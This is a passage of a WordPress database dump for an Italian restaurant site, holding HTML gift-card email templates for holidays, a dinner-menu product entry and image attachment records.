<td dir=\"ltr\" valign=\"top\" style=\"padding: 0 14px; height: 202px; \"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 10px; text-align: left;margin: 0 auto;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"font-size: 14.97px; letter-spacing: 1px; text-align:justify; height:auto; min-height: 159px; margin: 0px;\">[MESSAGE]</p><p style=\"font-size: 14.97px; letter-spacing: 1px; word-spacing: 1px; text-align:justify;margin: 0px;\"><span style=\"display: inline-block; text-align: right; width: 20%;vertical-align:top;\">From:</span><span style=\"display: inline-block; text-align: left; width: 180px; vertical-align:top;\">[FROM]</span></p><p style=\"margin:0;\"><span style=\"width:16%;vertical-align:top; display: inline-block; text-align: right;\"> To:</span><span style=\"display: inline-block; text-align: left; vertical-align:top; width: 180px;\">[TO]</span></p><strong style=\"color:#c31a1a; font-size: 23.96px; display: flex; padding-top: 10px; vertical-align:top;\">[AMOUNT]/-</strong> <br><br></td></tr></table> </td></tr></table> </td></tr><tr> <td style=\"font-size: 0; line-height: 0;\"> &nbsp; </td></tr><tr> <td bgcolor=\"#c31a1a\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\" padding:36px 28px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; text-align: center;\"> [DISCLAIMER] </td></tr></table> </td></tr></table> </center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width:460px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}</style>','Fathers Day','','publish','closed','closed','','fathers-day','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/fathers-day/',0,'giftcard','',0),(430,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','<center style=\"width: 100%; background: #222222;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td style=\"padding: 0px 0px 20px; text-align: center; background: #fff0cd \"> <p style=\"color:#80150b; font-size: 25px; font-family: sans-serif; margin: 0px;\"><strong>[LOGO] </strong></p></td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#fff0cd\"> <span class=\"feature_img\"> [FEATUREDIMAGE] </span> </td></tr><tr> <td bgcolor=\"#fff0cd\" style=\"padding: 50px 0px 30px; text-align: center; font-family: sans-serif; font-size: 14.97px; mso-height-rule: exactly; line-height: 9px; color: #555555;\"> <p style=\"background: #ffe7b1; border: 8px solid #ffd064; color: #80150b; font-size:15px; letter-spacing: 1px; padding: 33px 0; text-transform: uppercase; margin: 0; line-height:29px; text-align:center!important;\">Coupon Code<span style=\"display:block; font-size:25px;\">[COUPON]</span> <span style=\"display:block; font-size:15px;\">(Ed:[EXPIRYDATE])</span></p><br><br></td></tr><tr> <td bgcolor=\"#fff0cd\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding-bottom: 44px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0px 25px;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td class=\"gift-baskets-content\" style=\"font-size: 15px; line-height: 20px;word-wrap:break-word;\"> <p style=\"color:#000;word-spacing: 5px;;height: auto; min-height: 200px; \">[MESSAGE]</p></td></tr><tr> <td class=\"mail-content\" style=\"word-wrap:break-word\";> <span style=\"color: #000; font-size: 15px; float: left; vertical-align:top; margin-right:2% text-align: right;display-inline:block; width:18%;\">From- </span> <span style=\"color:#000;font-size:14px; vertical-align:top; display:inline-block; width:180px; float:left;\">[FROM]</span> </td></tr><tr> <td style=\"word-wrap:break-word\";> <span style=\"color: #000; font-size: 15px; max-width: 15%; float: left;margin-right:2%; text-align: right;width:100%;display:inline-block; vertical-align:top;\">To- </span> <span style=\"color:#000;font-size:14px; width:180px; float:left; vertical-align:top;\">[TO]</span> </td></tr><tr><td style=\"padding:5px 10px;word-wrap:break-word;\"> <span style=\"color:#8a2814;font-size: 23.96px; vertical-align:top; \"><strong>[AMOUNT]/-</strong> </span></td></tr></table> </td></td></tr></table> </td></tr><tr> <td bgcolor=\"#ffd064\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 15px; line-height: 20px; color: rgb(0, 0, 0); text-align: center;\"> [DISCLAIMER] </td></tr></table> </td></tr><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 90% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}</style>','Mothers Day','','publish','closed','closed','','mothers-day','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/mothers-day/',0,'giftcard','',0),(431,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','<center style=\"width: 100%; background: #222222;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><!-- <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding: 20px 0; text-align: center\"><img src=\"http://placehold.it/200x50\" width=\"200\" height=\"50\" alt=\"alt_text\" border=\"0\" style=\"height: auto; background: #dddddd; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555;\"></td></tr></table> --> <table role=\"presentation\" style=\"margin: auto;\" class=\"email-container\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"> <tbody> <tr style=\"background-color:#C9FFFB;\"> <td style=\" text-align:left; font-family: sans-serif;color: #AD1D20;\"> <h2 style=\"margin:0px; padding-left:25px; padding-top:25px;\">[LOGO]</h2> </td></tr></tbody> </table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#c9fffb\" style=\"padding: 20px 0 50px;\"> <span style=\"display:block; margin:0 auto;\" class=\"feature_image\"> [FEATUREDIMAGE] </span> </td></tr><tr> <td background=\"http://placehold.it/600x230/222222/666666\" bgcolor=\"#222222\" valign=\"middle\" style=\"text-align: center; background-position: center center !important; background-size: cover !important;\"><!--[if gte mso 9]> <v:rect xmlns:v=\"urn:schemas-microsoft-com:vml\" fill=\"true\" stroke=\"false\" style=\"width:600px;height:175px; background-position: center center !important;\"> <v:fill type=\"tile\" src=\"http://placehold.it/600x230/222222/666666\" color=\"#222222\"/> <v:textbox inset=\"0,0,0,0\"><![endif]--> <div> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td valign=\"middle\" style=\"text-align: center; font-family: sans-serif; font-size: 22px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; background-color: #ad1d20; letter-spacing: 2px;\"> <p style=\"padding: 25px 20px; text-align:center!important; border: 2px dashed #fff; margin: 10px 10px;\"><span style=\"font-size:22px;display:block\">COUPON</span><span style=\"font-size:30px;display:block;padding:15px 0px;\">[COUPON]</span><span style=\"font-size:22px;display:block\">(Ed:[EXPIRYDATE])</span></p></td></tr></table> </div><!--[if gte mso 9]> </v:textbox> </v:rect><![endif]--> </td></tr><tr> <td bgcolor=\"#C9FFFB\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding:70px 10px 70px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0 10px; text-align: center;/*background: #fff;*/ border-radius: 5px;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 22px; color: #555555; padding:0 10px; text-align: left;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"font-size: 15px; min-height:172px; height:auto; margin:0;\"> [MESSAGE]</p><p style=\"margin:0;\"><span style=\"font-size: 15px; display:inline-block; width:20%; text-align:right;\">From: </span> <span style=\"display:inline-block; vertical-align:top; width:180px;\">[FROM]</span></p><p style=\"margin-top:0;\"><span style=\"font-size: 15px;vertical-align:top; display:inline-block; width:20%; text-align:right;\">To: </span> <span style=\"display:inline-block; width:180px; vertical-align:top;\">[TO]</span><p> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" class=\"center-on-narrow\" style=\"float:left;\"> <tr> <td style=\"word-wrap:break-word\"; > <strong style=\"color:#AD1D20; font-size: 25px; vertical-align:top;\">[AMOUNT]/-</strong> </td></tr></table> </td></tr></table> </td></tr></table> </td></tr><tr> <td bgcolor=\"#ffffff\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 16px; mso-height-rule: exactly; line-height: 20px; color: #fff; background-color:#ad1d20;\"> <p style=\"font-size: 15px; letter-spacing: 1px; word-spacing: 1px;\">[DISCLAIMER]</p></td></tr></table> </td></tr></table> </center><style>/* Media Queries */ @media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: left !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 599px){.stack-column, .stack-column-center{display:block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}</style>','Christmas','','publish','closed','closed','','christmas','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/christmas/',0,'giftcard','',0),(432,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','<center style=\"width: 100%; background: #222222;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td style=\"padding: 20px 0 0 40px; text-align:left;color:#fff;background-color: #000;\"> [LOGO] </td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin:auto;padding:0;\" class=\"email-container\"> <tr> <td bgcolor=\"#000\"> <span class=\"feature_img\"> [FEATUREDIMAGE] </span> </td></tr><tr> <td bgcolor=\"#000\" style=\"padding:0 10px 30px;text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555;\"> <p style=\"font-size: 16px;border: 2px dashed red; text-align:center; line-height:40px; padding: 5% 20% ;margin: 0 auto;display:block;color:#fff;text-transform: uppercase;\">coupon <span style=\"display:block;font-size: 28.75px;\">[COUPON]</span> <span style=\"display:block;font-size:16px;\">(Ed:[EXPIRYDATE])</span></p></td></tr><tr> <td bgcolor=\"#000\" align=\"center\" valign=\"top\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td class=\"stack-column-center\" style=\"width: 50%;vertical-align: top;padding:15px 20px;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td style=\"padding:0; text-align: center;height: 300px;border-radius: 6px;vertical-align: top;\"> <span class=\"default-event\">[DEFAULTEVENT]</span> </td></tr></table> </td><td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%;padding:15px 20px;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td class=\"gift-baskets-content\" style=\"font-size: 15px; line-height: 20px; word-wrap:break-word;\"> <p style=\"color:#fff;word-spacing: 5px;;height: auto; min-height: 200px; \">[MESSAGE]</p></td></tr><tr> <td class=\"mail-content\" style=\"word-wrap:break-word;\"> <span style=\"color: rgb(255, 255, 255); font-size: 15px; float: left; vertical-align:top; margin-right:2% text-align: right;display-inline:block; max-width:21%;\">From- </span> <span style=\"color:#fff;font-size:14px; vertical-align:top; display:inline-block; width:180px; float:left;\">[FROM]</span> </td></tr><tr> <td style=\"word-wrap:break-word;\"> <span style=\"color: rgb(255, 255, 255); font-size: 15px; max-width: 15%; float: left;margin-right:2%; text-align: right;width:100%;display:inline-block; vertical-align:top;\">To- </span> <span style=\"color:#fff;font-size:14px; width:180px; float:left; vertical-align:top;\">[TO]</span> </td></tr><tr><td style=\"padding:5px 10px;\"> <span style=\"color:#dd1a22;font-size: 23.96px; vertical-align:top; word-wrap:break-word;\"><strong>[AMOUNT]/-</strong> </span></td></tr></table> </td></tr></table> </td></tr><tr> <td bgcolor=\"#ed1c24\" > <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 30px 35px; font-family: sans-serif; text-align:center; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;\"> [DISCLAIMER] </td></tr></table> </td></tr></table></center><style type=\"text/css\">/* Media Queries */ @media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}@media screen and (max-width: 599px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 85% !important; direction: ltr !important;}}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 320px){.stack-column-center{display:block; width:100%; margin:0 auto;}}.feature_img img{display: block; margin: 0 auto; max-width: 100%; width:100%;}</style>','Black Friday','','publish','closed','closed','','black-friday','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/black-friday/',0,'giftcard','',0),(433,1,'2017-07-10 21:44:41','2017-07-10 19:44:41','<center style=\"width: 100%;\"><div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding: 0px 0px 20px; text-align: center; background: #b2dbff \"><p style=\"color:#80150b; font-size: 25px; font-family: sans-serif; margin: 0px;\"><strong>[LOGO] </strong></p></td></tr></table>&nbsp;<table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin-top:-21px !important;\" class=\"email-container\"><tr><td bgcolor=\"#b2dbff\"><span class=\"feature_img\"> [FEATUREDIMAGE] </span></td></tr><tr><td style=\"padding: 10px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555;\" bgcolor=\"#1d568c\"><p style=\"background: #1d568c; border: 4px dashed #fff; color: #fff; font-size:15px; letter-spacing: 1px; padding: 33px 0; text-transform: uppercase; margin: 0; line-height:29px;\">coupon code<span style=\"display:block; font-size:25px;\">[COUPON]</span> <span style=\"display:block; font-size:15px;\">(Ed:[EXPIRYDATE]</span></p></td></tr><tr><td align=\"center\" valign=\"top\" bgcolor=\"#b2dbff\" style=\"padding:70px 0 70px 0\"><table role=\"presentation\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" border=\"0\"><tbody><tr><td class=\"stack-column-center\" style=\"width: 50%; vertical-align: top;\"><table role=\"presentation\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" border=\"0\"><tbody><tr><td style=\"padding: 0 15px; text-align: center;vertical-align:top;\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%; \"><table role=\"presentation\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" border=\"0\"><tbody><tr><td class=\"gift-baskets-content\" style=\"padding: 0 15px;word-wrap:break-word;\"><p style=\"color: #000; word-spacing: 5px; font-size: 16px;height:auto;min-height:180px;padding:0 0 20px 0;\">[MESSAGE]</p></td></tr><tr><td style=\"word-wrap:break-word\";><p style=\"font-size: 16px; color: #000; margin: 0;\"><span style=\"width: 20%; display: inline-block;vertical-align:top; text-align: right;\">From-</span><span style=\"width: 180px;font-size: 15px; display: inline-block; text-align: left;vertical-align:top;\">[FROM]</span></p></td></tr><tr><td style=\"word-wrap:break-word\";><p style=\"font-size: 16px; color: #000; margin: 0;\"><span style=\"width: 20%; display: inline-block; text-align: right;\">To-</span><span style=\"width: 180px;font-size: 15px; display: inline-block; text-align: left;vertical-align:top;\">[TO]</span></p></td></tr><tr><td style=\"word-wrap:break-word\";><p style=\"font-size: 31px; color: #1e578d;margin:0px 0px 0px 16px;\"><strong>[AMOUNT]/-</strong></p></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#1d568c\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 30px 35px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;\">[DISCLAIMER]</td></tr></tbody></table></td></tr></tbody></table>&nbsp;</center><style>@media screen and (max-width: 599px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_img > img{margin: 0 auto;display: block;width: 100%;}</style>','Independence Day','','publish','closed','closed','','independence-day','','','2017-07-10 21:44:41','2017-07-10 19:44:41','',0,'http://www.ristorantesolymar.it/giftcard/independence-day/',0,'giftcard','',0),(435,1,'2017-07-10 21:50:43','2017-07-10 19:50:43','<em>Benvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\nEuro 100 (Escluso Bavande)</em>','Regala cena: Menù Creativo per 2 persone','<em>Benvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\nEuro 100,00 (Escluso Bavande)</em>','publish','closed','closed','','menu-creativo-2-persone','','','2019-07-16 21:11:28','2019-07-16 19:11:28','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=435',0,'product','',0),(436,1,'2017-07-10 22:09:37','2017-07-10 20:09:37','&nbsp;\n<table class=\"email-container\" style=\"margin: auto; width: 100%!important;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 10px; text-align: left;\">[LOGO]</td>\n<td style=\"padding: 20px 10; text-align: right;\"><span style=\"font-size: 35px; font-family: arial; display: block;\">Buono del valore\n[AMOUNT]</span><span style=\"font-size: 16px;\"><em><span style=\"font-family: arial; display: block;\">(Scadenza: [EXPIRYDATE])</span></em></span></td>\n</tr>\n</tbody>\n</table>\n<table class=\"email-container\" style=\"margin: auto; width: 100%!important;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td style=\"padding: 10px;\" align=\"center\" valign=\"top\">\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\n<table role=\"presentation\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 10px; text-align: center;\">[DEFAULTEVENT]</td>\n</tr>\n<tr>\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; padding: 0 10px 10px; text-align: left;\"></td>\n</tr>\n</tbody>\n</table>\n</td>\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 10px;\">\n<p style=\"min-height: 190px;\">[MESSAGE]</p>\n</td>\n</tr>\n<tr>\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; padding: 0 10px 10px; text-align: left;\">\n<p style=\"font-size: 14px; font-family: sans-serif; margin: 0; font-weight: bold;\"><span style=\"width: 22%; float: left; word-wrap: break-word; word-break: break-all; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-wrap: break-word; word-break: break-all;\">[FROM]</span></p>\n<p style=\"font-size: 14px; font-family: sans-serif; margin: 0; font-weight: bold;\"><span style=\"width: 22%; float: left; word-wrap: break-word; word-break: break-all; padding: 0 3% 0 0; text-align: right;\">Per :</span><span style=\"width: 75%; float: left; word-wrap: break-word; word-break: break-all;\">[TO]</span></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 40px 0px;\" align=\"center\"><span style=\"font-size: 25px;\">Coupon Code</span>\n<p style=\"background-color: #e91e63; color: #fff; padding: 10px 10px; font-size: 26px; font-family: arial; margin: 10px 0px 10px 0px; letter-spacing: 10px; word-wrap: break-word; word-break: break-all;\">[COUPON]</p>\n</td>\n</tr>\n</tbody>\n</table>\n<table class=\"email-container\" style=\"margin: auto; width: 100%!important;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#333333\">\n<tbody>\n<tr>\n<td style=\"padding: 10px 10px; width: 100%; font-size: 14px; font-weight: bold; font-family: sans-serif; mso-height-rule: exactly; line-height: 18px; text-align: center; color: #ffffff;\" bgcolor=\"#333333\">[DISCLAIMER]</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<style type=\"text/css\">@media screen and (max-width: 480px){.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}.stack-column-center{text-align: center !important;}}</style>','Template personalizzato','','inherit','closed','closed','','401-autosave-v1','','','2017-07-10 22:09:37','2017-07-10 20:09:37','',401,'http://www.ristorantesolymar.it/2017/07/10/401-autosave-v1/',0,'revision','',0),(437,1,'2017-07-11 09:39:32','2017-07-11 07:39:32','','thanksgive-1','','inherit','open','closed','','thanksgive-1','','','2017-07-11 09:39:32','2017-07-11 07:39:32','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/thanksgive-1.png',0,'attachment','image/png',0),(438,1,'2017-07-11 09:39:33','2017-07-11 07:39:33','','president-day-1','','inherit','open','closed','','president-day-1','','','2017-07-11 09:39:33','2017-07-11 07:39:33','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/president-day-1.png',0,'attachment','image/png',0),(439,1,'2017-07-11 09:39:33','2017-07-11 07:39:33','','halloween-1','','inherit','open','closed','','halloween-1','','','2017-07-11 09:39:33','2017-07-11 07:39:33','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/halloween-1.png',0,'attachment','image/png',0),(440,1,'2017-07-11 09:39:34','2017-07-11 07:39:34','','Group-1-1','','inherit','open','closed','','group-1-1','','','2017-07-11 09:39:34','2017-07-11 07:39:34','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/Group-1-1.png',0,'attachment','image/png',0),(441,1,'2017-07-11 09:39:34','2017-07-11 07:39:34','','Shape-4-copy-4-1','','inherit','open','closed','','shape-4-copy-4-1','','','2017-07-11 09:39:34','2017-07-11 07:39:34','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/Shape-4-copy-4-1.png',0,'attachment','image/png',0),(442,1,'2017-07-11 09:39:35','2017-07-11 07:39:35','','mother-1','','inherit','open','closed','','mother-1','','','2017-07-11 09:39:35','2017-07-11 07:39:35','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/mother-1.png',0,'attachment','image/png',0),(443,1,'2017-07-11 09:39:35','2017-07-11 07:39:35','','christmas-1','','inherit','open','closed','','christmas-1','','','2017-07-11 09:39:35','2017-07-11 07:39:35','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/christmas-1.png',0,'attachment','image/png',0),(444,1,'2017-07-11 09:39:35','2017-07-11 07:39:35','','banner-1','','inherit','open','closed','','banner-1','','','2017-07-11 09:39:35','2017-07-11 07:39:35','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/banner-1.png',0,'attachment','image/png',0),(445,1,'2017-07-11 09:39:35','2017-07-11 07:39:35','','independence-1','','inherit','open','closed','','independence-1','','','2017-07-11 09:39:35','2017-07-11 07:39:35','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/independence-1.png',0,'attachment','image/png',0),(446,1,'2017-07-11 09:39:36','2017-07-11 07:39:36','','newyear-1','','inherit','open','closed','','newyear-1','','','2017-07-11 09:39:36','2017-07-11 07:39:36','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/newyear-1.png',0,'attachment','image/png',0),(447,1,'2017-07-11 09:39:36','2017-07-11 07:39:36','','birthday-1','','inherit','open','closed','','birthday-1','','','2017-07-11 09:39:36','2017-07-11 07:39:36','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/birthday-1.png',0,'attachment','image/png',0),(448,1,'2017-07-11 09:39:36','2017-07-11 07:39:36','','anniversary-1','','inherit','open','closed','','anniversary-1','','','2017-07-11 09:39:36','2017-07-11 07:39:36','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/anniversary-1.png',0,'attachment','image/png',0),(449,1,'2017-07-11 09:39:36','2017-07-11 07:39:36','','eid-1','','inherit','open','closed','','eid-1','','','2017-07-11 09:39:36','2017-07-11 